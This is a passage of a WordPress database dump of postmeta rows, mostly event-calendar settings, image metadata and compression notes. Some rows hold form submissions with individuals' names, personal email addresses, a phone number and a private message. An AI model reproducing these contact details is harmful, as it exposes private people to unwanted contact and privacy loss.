(149197,265870,'smush-info','The file was compressed from 84.09 KB to 76.14 KB saving 9.45 percent using WP-Optimize'),(149198,265870,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:86107;s:12:\"smushed-size\";i:77972;s:15:\"savings-percent\";d:9.449999999999999289457264239899814128875732421875;}'),(149199,265871,'mec_moved_online_link',''),(149200,265871,'mec_cancelled_reason',''),(149201,265871,'mec_display_cancellation_reason_in_single_page',''),(149202,265871,'boldgrid_hide_page_title','0'),(149203,265871,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(149204,265871,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-01\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-01\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(149205,265871,'mec_currency','a:0:{}'),(149206,265871,'mec_additional_organizer_ids','a:0:{}'),(149207,265871,'mec_additional_location_ids','a:0:{}'),(149208,265871,'mec_cost',''),(149209,265871,'mec_more_info_target','_self'),(149210,265871,'mec_more_info_title',''),(149211,265871,'mec_organizer_id','1'),(149212,265871,'mec_read_more',''),(149213,265871,'mec_more_info',''),(149214,265871,'mec_repeat_type',''),(149215,265871,'mec_repeat_status','0'),(149216,265871,'mec_end_day_seconds','72000'),(149217,265871,'mec_end_time_ampm','PM'),(149218,265871,'mec_end_time_minutes','0'),(149219,265871,'mec_end_time_hour','8'),(149220,265871,'mec_end_date','2021-12-01'),(149221,265871,'mec_start_day_seconds','68400'),(149222,265871,'mec_start_time_ampm','PM'),(149223,265871,'mec_start_time_minutes','0'),(149224,265871,'mec_public','1'),(149225,265871,'mec_start_date','2021-12-01'),(149226,265871,'mec_start_time_hour','7'),(149227,265871,'mec_countdown_method','global'),(149228,265871,'mec_timezone','global'),(149229,265871,'mec_comment',''),(149230,265871,'one_occurrence','0'),(149231,265871,'mec_hide_time','0'),(149232,265871,'mec_hide_end_time','0'),(149233,265871,'mec_event_status','EventScheduled'),(149234,265871,'mec_fields','a:0:{}'),(149235,265871,'mec_op','a:0:{}'),(149236,265871,'mec_bfixed_fields','a:0:{}'),(149237,265871,'mec_reg_fields','a:0:{}'),(149238,265871,'mec_reg_fields_global_inheritance','1'),(149239,265871,'mec_ticket_variations','a:0:{}'),(149240,265871,'mec_ticket_variations_global_inheritance','1'),(149241,265871,'mec_fees','a:0:{}'),(149242,265871,'mec_booking','a:0:{}'),(149243,265871,'mec_tickets','a:0:{}'),(149244,265871,'mec_fees_global_inheritance','1'),(149245,265871,'mec_hourly_schedules','a:0:{}'),(149246,265871,'mec_not_in_days',''),(149247,265871,'mec_in_days',''),(149248,265871,'mec_repeat_end_at_date',''),(149249,265871,'mec_advanced_days','a:0:{}'),(149250,265871,'passster_protection_type','password'),(149251,265871,'passster_activate_global_protection',NULL),(149252,265871,'passster_activate_protection',NULL),(149253,265871,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149254,265871,'mec_repeat_end_at_occurrences',''),(149255,265871,'mec_repeat_end',''),(149256,265871,'mec_repeat_interval','1'),(149257,265871,'mec_allday','0'),(149258,265871,'mec_certain_weekdays','a:0:{}'),(149259,265871,'mec_dont_show_map','0'),(149260,265871,'mec_location_id','118'),(149261,265871,'mec_color',''),(149262,265871,'protect_children',''),(149263,265871,'_edit_lock','1636481128:2'),(149264,265871,'_edit_last','2'),(149265,265871,'_thumbnail_id','265872'),(149266,265872,'_wp_attached_file','2021/11/black-white-connection-clean.jpg'),(149267,265872,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:637;s:6:\"height\";i:358;s:4:\"file\";s:40:\"2021/11/black-white-connection-clean.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"black-white-connection-clean-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"black-white-connection-clean-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:40:\"black-white-connection-clean-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:40:\"black-white-connection-clean-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:40:\"black-white-connection-clean-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:40:\"black-white-connection-clean-300x358.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:358;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:40:\"black-white-connection-clean-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(149268,265872,'original-file','2021/11/black-white-connection-clean-updraft-pre-smush-original.jpg'),(149269,265872,'smush-complete','1'),(149270,265872,'smush-info','The file was compressed from 37.45 KB to 33.48 KB saving 10.6 percent using WP-Optimize'),(149271,265872,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:38350;s:12:\"smushed-size\";i:34283;s:15:\"savings-percent\";d:10.5999999999999996447286321199499070644378662109375;}'),(149272,265874,'mec_moved_online_link',''),(149273,265874,'mec_cancelled_reason',''),(149274,265874,'mec_display_cancellation_reason_in_single_page',''),(149275,265874,'boldgrid_hide_page_title','0'),(149276,265874,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(149277,265874,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-15\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-15\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(149278,265874,'mec_currency','a:0:{}'),(149279,265874,'mec_additional_organizer_ids','a:0:{}'),(149280,265874,'mec_additional_location_ids','a:0:{}'),(149281,265874,'mec_cost',''),(149282,265874,'mec_more_info_target','_self'),(149283,265874,'mec_more_info_title',''),(149284,265874,'mec_organizer_id','1'),(149285,265874,'mec_read_more',''),(149286,265874,'mec_more_info',''),(149287,265874,'mec_repeat_type',''),(149288,265874,'mec_repeat_status','0'),(149289,265874,'mec_end_day_seconds','57600'),(149290,265874,'mec_end_time_ampm','PM'),(149291,265874,'mec_end_time_minutes','0'),(149292,265874,'mec_end_time_hour','4'),(149293,265874,'mec_end_date','2021-11-15'),(149294,265874,'mec_start_day_seconds','54000'),(149295,265874,'mec_start_time_ampm','PM'),(149296,265874,'mec_start_time_minutes','0'),(149297,265874,'mec_public','1'),(149298,265874,'mec_start_date','2021-11-15'),(149299,265874,'mec_start_time_hour','3'),(149300,265874,'mec_countdown_method','global'),(149301,265874,'mec_timezone','global'),(149302,265874,'mec_comment',''),(149303,265874,'one_occurrence','0'),(149304,265874,'mec_hide_time','0'),(149305,265874,'mec_hide_end_time','0'),(149306,265874,'mec_event_status','EventScheduled'),(149307,265874,'mec_fields','a:0:{}'),(149308,265874,'mec_op','a:0:{}'),(149309,265874,'mec_bfixed_fields','a:0:{}'),(149310,265874,'mec_reg_fields','a:0:{}'),(149311,265874,'mec_reg_fields_global_inheritance','1'),(149312,265874,'mec_ticket_variations','a:0:{}'),(149313,265874,'mec_ticket_variations_global_inheritance','1'),(149314,265874,'mec_fees','a:0:{}'),(149315,265874,'mec_booking','a:0:{}'),(149316,265874,'mec_tickets','a:0:{}'),(149317,265874,'mec_fees_global_inheritance','1'),(149318,265874,'mec_hourly_schedules','a:0:{}'),(149319,265874,'mec_not_in_days',''),(149320,265874,'mec_in_days',''),(149321,265874,'mec_repeat_end_at_date',''),(149322,265874,'mec_advanced_days','a:0:{}'),(149323,265874,'passster_protection_type','password'),(149324,265874,'passster_activate_global_protection',NULL),(149325,265874,'passster_activate_protection',NULL),(149326,265874,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149327,265874,'mec_repeat_end_at_occurrences',''),(149328,265874,'mec_repeat_end',''),(149329,265874,'mec_repeat_interval','1'),(149330,265874,'mec_allday','0'),(149331,265874,'mec_certain_weekdays','a:0:{}'),(149332,265874,'mec_dont_show_map','0'),(149333,265874,'mec_location_id','118'),(149334,265874,'mec_color',''),(149335,265874,'protect_children',''),(149336,265874,'_edit_lock','1635974133:2'),(149337,265874,'_edit_last','2'),(149338,265874,'_thumbnail_id','265875'),(149339,265875,'_wp_attached_file','2021/11/star-bridge.jpg'),(149340,265875,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:533;s:6:\"height\";i:303;s:4:\"file\";s:23:\"2021/11/star-bridge.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"star-bridge-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"star-bridge-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:23:\"star-bridge-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:23:\"star-bridge-474x303.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:303;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:23:\"star-bridge-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:23:\"star-bridge-300x303.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:303;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"star-bridge-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(149341,265877,'mec_moved_online_link',''),(149342,265877,'mec_cancelled_reason',''),(149343,265877,'mec_display_cancellation_reason_in_single_page',''),(149344,265877,'boldgrid_hide_page_title','0'),(149345,265877,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(149346,265877,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-22\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-22\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(149347,265877,'mec_currency','a:0:{}'),(149348,265877,'mec_additional_organizer_ids','a:0:{}'),(149349,265877,'mec_additional_location_ids','a:0:{}'),(149350,265877,'mec_cost',''),(149351,265877,'mec_more_info_target','_self'),(149352,265877,'mec_more_info_title',''),(149353,265877,'mec_organizer_id','1'),(149354,265877,'mec_read_more',''),(149355,265877,'mec_more_info',''),(149356,265877,'mec_repeat_type',''),(149357,265877,'mec_repeat_status','0'),(149358,265877,'mec_end_day_seconds','72000'),(149359,265877,'mec_end_time_ampm','PM'),(149360,265877,'mec_end_time_minutes','0'),(149361,265877,'mec_end_time_hour','8'),(149362,265877,'mec_end_date','2021-11-22'),(149363,265877,'mec_start_day_seconds','68400'),(149364,265877,'mec_start_time_ampm','PM'),(149365,265877,'mec_start_time_minutes','0'),(149366,265877,'mec_public','1'),(149367,265877,'mec_start_date','2021-11-22'),(149368,265877,'mec_start_time_hour','7'),(149369,265877,'mec_countdown_method','global'),(149370,265877,'mec_timezone','global'),(149371,265877,'mec_comment',''),(149372,265877,'one_occurrence','0'),(149373,265877,'mec_hide_time','0'),(149374,265877,'mec_hide_end_time','0'),(149375,265877,'mec_event_status','EventScheduled'),(149376,265877,'mec_fields','a:0:{}'),(149377,265877,'mec_op','a:0:{}'),(149378,265877,'mec_bfixed_fields','a:0:{}'),(149379,265877,'mec_reg_fields','a:0:{}'),(149380,265877,'mec_reg_fields_global_inheritance','1'),(149381,265877,'mec_ticket_variations','a:0:{}'),(149382,265877,'mec_ticket_variations_global_inheritance','1'),(149383,265877,'mec_fees','a:0:{}'),(149384,265877,'mec_booking','a:0:{}'),(149385,265877,'mec_tickets','a:0:{}'),(149386,265877,'mec_fees_global_inheritance','1'),(149387,265877,'mec_hourly_schedules','a:0:{}'),(149388,265877,'mec_not_in_days',''),(149389,265877,'mec_in_days',''),(149390,265877,'mec_repeat_end_at_date',''),(149391,265877,'mec_advanced_days','a:0:{}'),(149392,265877,'passster_protection_type','password'),(149393,265877,'passster_activate_global_protection',NULL),(149394,265877,'passster_activate_protection',NULL),(149395,265877,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(149396,265877,'mec_repeat_end_at_occurrences',''),(149397,265877,'mec_repeat_end',''),(149398,265877,'mec_repeat_interval','1'),(149399,265877,'mec_allday','0'),(149400,265877,'mec_certain_weekdays','a:0:{}'),(149401,265877,'mec_dont_show_map','0'),(149402,265877,'mec_location_id','118'),(149403,265877,'mec_color',''),(149404,265877,'protect_children',''),(149405,265877,'_edit_lock','1635974421:2'),(149406,265877,'_edit_last','2'),(149407,265877,'_thumbnail_id','265875'),(169168,267186,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(169167,267186,'mec_hourly_schedules','a:0:{}'),(169166,267186,'mec_not_in_days',''),(169165,267186,'mec_in_days',''),(169164,267186,'mec_advanced_days','a:0:{}'),(169163,267186,'mec_repeat_end_at_date',''),(169162,267186,'mec_repeat_end_at_occurrences',''),(169161,267186,'mec_repeat_end',''),(169160,267186,'mec_repeat_interval','1'),(169159,267186,'mec_repeat_type',''),(169158,267186,'mec_repeat_status','0'),(149432,265881,'_field_224','Jean'),(149433,265881,'_field_225','Davis'),(149434,265881,'_field_226','jean5030@gmail.com'),(149435,265881,'_field_227','CO'),(149436,265881,'_field_228','US'),(149437,265881,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(149438,265881,'_form_id','21'),(149439,265881,'_seq_num','137'),(169157,267186,'mec_comment',''),(169156,267186,'mec_hide_end_time','0'),(169155,267186,'mec_hide_time','0'),(169153,267186,'mec_certain_weekdays','a:0:{}'),(169154,267186,'mec_allday','0'),(169152,267186,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(169151,267186,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-23\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-23\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(169150,267186,'mec_end_day_seconds','68400'),(169149,267186,'mec_end_time_ampm','PM'),(169148,267186,'mec_end_time_minutes','0'),(149505,265891,'_form_id','13'),(149506,265891,'_seq_num','89'),(149507,265892,'_field_402','Marsha'),(149508,265892,'_field_403','Brown'),(149509,265892,'_field_404','marsha.satya@gmail.com'),(149510,265892,'_form_id','44'),(149511,265892,'_seq_num','15'),(149512,265893,'_field_402','Reid'),(149513,265893,'_field_403','Heassler'),(149514,265893,'_field_404','jartzchongrh@live.com'),(149515,265893,'_form_id','44'),(149516,265893,'_seq_num','16'),(149517,265894,'_field_402','Brad'),(149518,265894,'_field_403','Szollose'),(149519,265894,'_field_404','bradszollose@gmail.com'),(149520,265894,'_form_id','44'),(149521,265894,'_seq_num','17'),(149522,265895,'_field_402','Reid'),(149523,265895,'_field_403','Heassler'),(149524,265895,'_field_404','jartzchongrh@gmail.com'),(149525,265895,'_form_id','44'),(149526,265895,'_seq_num','18'),(169125,267185,'boldgrid_hide_page_title','0'),(169126,267185,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(169124,267185,'mec_display_cancellation_reason_in_single_page',''),(169123,267185,'mec_cancelled_reason',''),(169122,267185,'mec_moved_online_link',''),(169121,267185,'mec_event_status','EventScheduled'),(169119,267185,'mec_op','a:0:{}'),(169120,267185,'mec_fields','a:0:{}'),(169117,267185,'mec_reg_fields','a:0:{}'),(169118,267185,'mec_bfixed_fields','a:0:{}'),(169116,267185,'mec_reg_fields_global_inheritance','1'),(169115,267185,'mec_ticket_variations','a:0:{}'),(169114,267185,'mec_ticket_variations_global_inheritance','1'),(169113,267185,'mec_fees','a:0:{}'),(169112,267185,'mec_fees_global_inheritance','1'),(169111,267185,'mec_tickets','a:0:{}'),(149551,265899,'_field_286','Debra'),(149552,265899,'_field_287','Kraft'),(149553,265899,'_field_288','debrakraft@diamondspectrums.com'),(149554,265899,'_field_289','(303) 968-9304'),(149555,265899,'_field_290','Denver'),(149556,265899,'_field_293','initiator-jack-lile-denver-metro-south'),(149557,265899,'_field_294','Hi Jack:\n\nI’d like to schedule an initiation of the second circle. I have a crazy schedule, so feel free to email me with a few options for a time to call. Thank you so much.\n\nDebra\n\n'),(149558,265899,'_form_id','32'),(149559,265899,'_seq_num','4'),(149560,265900,'mec_moved_online_link',''),(149561,265900,'mec_cancelled_reason',''),(149562,265900,'mec_display_cancellation_reason_in_single_page',''),(149563,265900,'boldgrid_hide_page_title','0'),(149564,265900,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(149565,265900,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-01\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-01\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(149566,265900,'mec_currency','a:0:{}'),(149567,265900,'mec_additional_organizer_ids','a:0:{}'),(149568,265900,'mec_additional_location_ids','a:0:{}'),(149569,265900,'mec_cost',''),(149570,265900,'mec_more_info_target','_self'),(149571,265900,'mec_more_info_title',''),(149572,265900,'mec_organizer_id','1'),(149573,265900,'mec_read_more',''),(149574,265900,'mec_more_info',''),(149575,265900,'mec_repeat_type',''),(149576,265900,'mec_repeat_status','0'),(149577,265900,'mec_end_day_seconds','72000'),(149578,265900,'mec_end_time_ampm','PM'),(149579,265900,'mec_end_time_minutes','0'),(149580,265900,'mec_end_time_hour','8'),(149581,265900,'mec_end_date','2021-12-01'),(149582,265900,'mec_start_day_seconds','68400'),(149583,265900,'mec_start_time_ampm','PM'),(149584,265900,'mec_start_time_minutes','0'),(149585,265900,'mec_public','1'),(149586,265900,'mec_start_date','2021-12-01'),(149587,265900,'mec_start_time_hour','7'),(149588,265900,'mec_countdown_method','global'),(149589,265900,'mec_timezone','global'),(149590,265900,'mec_comment',''),(149591,265900,'one_occurrence','0'),(149592,265900,'mec_hide_time','0'),(149593,265900,'mec_hide_end_time','0'),(149594,265900,'mec_event_status','EventScheduled'),(149595,265900,'mec_fields','a:0:{}'),(149596,265900,'mec_op','a:0:{}'),(149597,265900,'mec_bfixed_fields','a:0:{}'),(149598,265900,'mec_reg_fields','a:0:{}'),(149599,265900,'mec_reg_fields_global_inheritan